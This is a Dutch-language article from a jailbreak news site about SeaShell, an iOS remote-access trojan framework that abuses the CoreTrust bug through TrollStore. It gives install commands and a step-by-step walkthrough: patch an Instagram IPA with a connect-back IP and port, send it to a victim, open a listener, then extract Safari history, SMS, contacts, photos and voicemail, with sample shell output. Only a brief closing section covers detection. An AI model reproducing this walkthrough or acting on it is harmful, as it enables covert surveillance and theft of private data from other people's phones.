ONE Jailbreak Ad
Onderzoek Bijgewerkt 10 juni, 2025

SeaShell Trojan Horse voor iOS

Promotion image of SeaShell article.

Veel gebruikers zien de CoreTrust-bug, die wordt gebruikt door het TrollStore IPA-installatieprogramma, als een handige functie waarmee apps en tweaks permanent en zonder beperkingen van welke bron dan ook kunnen worden geïnstalleerd op iPhones met iOS 14, iOS 15 en iOS 16. De bug herbergt echter een duisterder potentieel, omdat deze kan worden misbruikt om heimelijk de controle over uw iPhone over te nemen, waardoor u uw apparaat heimelijk en zonder uw medeweten kunt bespioneren.

Wat is SeaShell?

SeaShell is een framework dat is ontworpen om een IPA-bestand voor TrollStore of Esign te patchen, waardoor malware kan worden geïnjecteerd. Deze schadelijke software maakt verbinding op afstand met het doelapparaat mogelijk, waardoor het in feite een Trojaans paard wordt op de iPhone of iPad van een nietsvermoedend slachtoffer. SeaShell maakt gebruik van de CoreTrust-bug en opereert heimelijk, wat aanzienlijke beveiligingsrisico's voor gebruikers oplevert. Gepatchte IPA moet worden geïnstalleerd met TrollStore of TrollStore 2.

Het iOS post-exploitatieframework SeaShell biedt gebruikers de mogelijkheid om op afstand toegang te krijgen tot, gegevens te manipuleren en te extraheren van doelapparaten. Dankzij de veelzijdige architectuur kunnen gebruikers moeiteloos modules op maat ontwikkelen, afgestemd op specifieke taken. SeaShell is echter standaard uitgerust met verschillende essentiële modules die ontworpen zijn om gevoelige informatie naadloos te extraheren. Bovendien kunt u de IPA patchen met een Trojaans paard.

Om het proces te starten, hoeft alleen een aangepast IPA-bestand te worden gegenereerd. Dit bestand kan vervolgens op het doelapparaat worden geïnstalleerd via kanalen zoals TrollStore of een ander IPA-installatieprogramma dat de beperkingen van CoreTrust kan omzeilen. Zodra de applicatie succesvol is geïnstalleerd, hoeft het doelapparaat de app slechts één keer te starten en te sluiten.

Schermafbeelding van SeaShell Trojan Horse voor iOS.

SeaShell biedt onder andere modules voor het extraheren van kritieke datapunten. Gebruikers kunnen bijvoorbeeld een module gebruiken om gedetailleerde contactgegevens op te halen die zijn opgeslagen in het bestand AddressBook.sqlitedb. Daarnaast kunnen gebruikers systeeminformatie bekijken, zoals het apparaat en de geïnstalleerde iOS-firmware, en foto's downloaden die toegankelijk zijn op het apparaat of in iCloud.

Bovendien maakt SeaShell het verkennen van Safari-bladwijzers en browsegeschiedenis mogelijk, waardoor gebruikers de digitale voetafdruk van het doelapparaat kunnen onderzoeken. Deze functie maakt het mogelijk om browsegegevens te extraheren en op te slaan in een handig JSON-formaat voor analyse.

Bovendien bevat het framework modules die speciaal zijn ontworpen om toegang te krijgen tot voicemailgegevens uit het bestand voicemail.db, wat inzicht biedt in communicatiepatronen en interacties. SeaShell biedt daarnaast de functionaliteit om sms-gegevens te downloaden of te bekijken, waardoor gebruikers sms-berichten kunnen monitoren en analyseren, wat mogelijk waardevolle inzichten of bewijs oplevert.

Kortom, SeaShell biedt niet alleen een flexibel platform voor het ontwikkelen van aangepaste modules, maar bevat ook een aantal vooraf gebouwde tools waarmee u gevoelige informatie van iOS-apparaten kunt extraheren.

SeaShell wordt uitgevoerd in de Terminal-app.

Let op: SeaShell vereist dat gebruikers een gewijzigd IPA-bestand downloaden, dit sideloaden op het apparaat met TrollStore en het minimaal één keer uitvoeren om het apparaat te compromitteren.

Deze uitgebreide reeks functies onderstreept de doeltreffendheid van het raamwerk in scenario's na exploitatie en benadrukt de mogelijkheden ervan voor zowel legitieme als kwaadaardige doeleinden.

SeaShell beschikt over een enorm krachtige functionaliteit: de mogelijkheid om verbinding te maken met diverse applicaties, waaronder, maar niet beperkt tot, Contacts.app. Deze functionaliteit geeft gebruikers ongekende controle, waardoor ze systeem-apps kunnen vervangen, app-containers kunnen doorzoeken, nieuwe processen kunnen toevoegen, uitvoerbare bestanden kunnen patchen, machtigingen voor uitvoerbare bestanden kunnen wijzigen, patches kunnen uploaden en meer. Er is ook een ingebouwde optie om de speler van het slachtoffer te bedienen met opties zoals stoppen, afspelen, volgende, enzovoort.

Met deze functie kunnen gebruikers het Trojaanse paard voor iOS naar verschillende apps verplaatsen, waaronder systeemapps als Rekenmachine, Contacten, enzovoort.

De mogelijkheden voor misbruik zijn grenzeloos, en SeaShell biedt een breed scala aan mogelijkheden voor geavanceerde aanvallen en manipulaties. SeaShell maakt gebruik van de formidabele mogelijkheden van een geavanceerde payload genaamd Pwny, bekend om zijn overvloed aan functies die zijn ontworpen om complexe misbruiktactieken mogelijk te maken. Met Pwny als kern biedt SeaShell gebruikers een robuust raamwerk voor het uitvoeren van geavanceerde manoeuvres op het gebied van cybersecurity.

Hoe SeaShell te installeren

SeaShell is een Python-script dat eenvoudig te installeren is via de pip-pakketbeheerder. Om het SeaShell Framework te installeren, voert u simpelweg de volgende opdracht in uw terminal in:

 pip3 install git+https://github.com/EntySec/SeaShell

Schermafbeelding van het SeaShell-installatieproces in de terminal-app.

Pwny is een implementatie van een geavanceerde payload, geschreven in pure C en ontworpen voor draagbaarheid en uitbreidbaarheid voor iOS-apparaten. Gebruik de volgende opdracht om pwny te installeren:

 pip3 install git+https://github.com/EntySec/HatSploit

Hoe het SeaShell Framework te gebruiken

SeaShell maakt gebruik van een applicatiebundel bestaande uit een eenvoudig uitvoerbaar bestand en een ander uitvoerbaar bestand dat verantwoordelijk is voor het initiëren van de Pwny-payload. Deze tool stelt gebruikers in staat om elk IPA-bestand te wijzigen, bijvoorbeeld door een aangepaste Instagram IPA te patchen met het Trojaanse paard. Er is ook een optie om een IPA-bestand met de malware te maken met een valse naam en een vals pictogram.

Stap 1. Open de terminal-app en voer de seashell-opdracht uit om het framework uit te voeren.

 seashell

Stap 2. Patch een IPA-bestand en geef uw IP en poort voor verbinding op.

(seashell)> ipa patch Instagram.ipa 
Host to connect back: 192.168.0.1 
Port to connect back: 8888 
IPA at Instagram.ipa patched.

Stap 3. Stuur de IPA naar het slachtoffer voor installatie via TrollStore.

Stap 4. Open de listener op uw computer en wacht op de verbinding.

 (seashell)> listener on 0.0.0.0:8888

Stap 5. Nadat de verbinding succesvol is, voert u de volgende modules uit: safari_history, player, sysinfo, sms, devices, ipa, voicemail, photos, safari_bookmarks, contacts etc.

 pwny:/ root# safari_history History.db |███████████████████████████████████████▌| ▁▃▅ 305/305 [100%] in 1s History.db-wal |███████████████████████████████████████▌| ▁▃▅ 305/305 [100%] in 1s [*] Parsing history database... History: Date URL ---- --- 2024-02-28 09:35:57 https://onejailbreak.com pwny:/ root#

Om toegang te verlenen tot SMS-gegevens kunt u een lijst maken van de chats in de SMS-app met de opdracht sms -l. U kunt ook de chatgeschiedenis met een specifiek contact extraheren met sms .

 pwny:/ root# sms 123456789 sms.db |███████████████████████████████████████▌| ▁▃▅ 305/305 [100%] in 1s sms.db-wal |███████████████████████████████████████▌| ▁▃▅ 305/305 [100%] in 1s [*] Parsing SMS for 123456789... Sms (11111111111): ID Date Status Text -- ---- ------ ---- 1 2024-02-28 11:01:21 Sent Vist ONEJailbreak.com pwny:/ root#

Hoe je het Trojaanse paard SeaShell kunt detecteren

Om het risico te verkleinen dat u slachtoffer wordt van aanvallen via het SeaShell-framework, kunt u enkele suggesties volgen om de standaardconfiguratie van gepatchte IPA-bestanden van SeaShell te detecteren. Het project is echter open source en kan eenvoudig worden aangepast om de waarden aan te passen.

  1. Pak het IPA-bestand uit dat u wilt installeren.
  2. Controleer de app-bundel op een uitvoerbaar bestand met de naam 'mussel'. Dit bestand dient als representatie van de Pwny-payload.
  3. Bekijk het bestand Info.plist en zoek naar "CFBundleBase64Hash". Dit bestand bevat een hostpaar dat is gecodeerd met base64 (:).
  4. Controleer de hash-som van het bestand om de integriteit ervan te garanderen voordat u doorgaat met de installatie.
Author Photo
Geschreven door
Kuba Pawlak

Kuba heeft meer dan 20 jaar ervaring in de journalistiek en richt zich sinds 2012 op jailbreaken. Hij heeft professionals van diverse bedrijven geïnterviewd. Naast journalistiek specialiseert Kuba zich in videobewerking en dronevliegen. Voordat hij aan zijn schrijverscarrière begon, studeerde hij IT aan de universiteit.

Plaats een reactie

Laatste berichten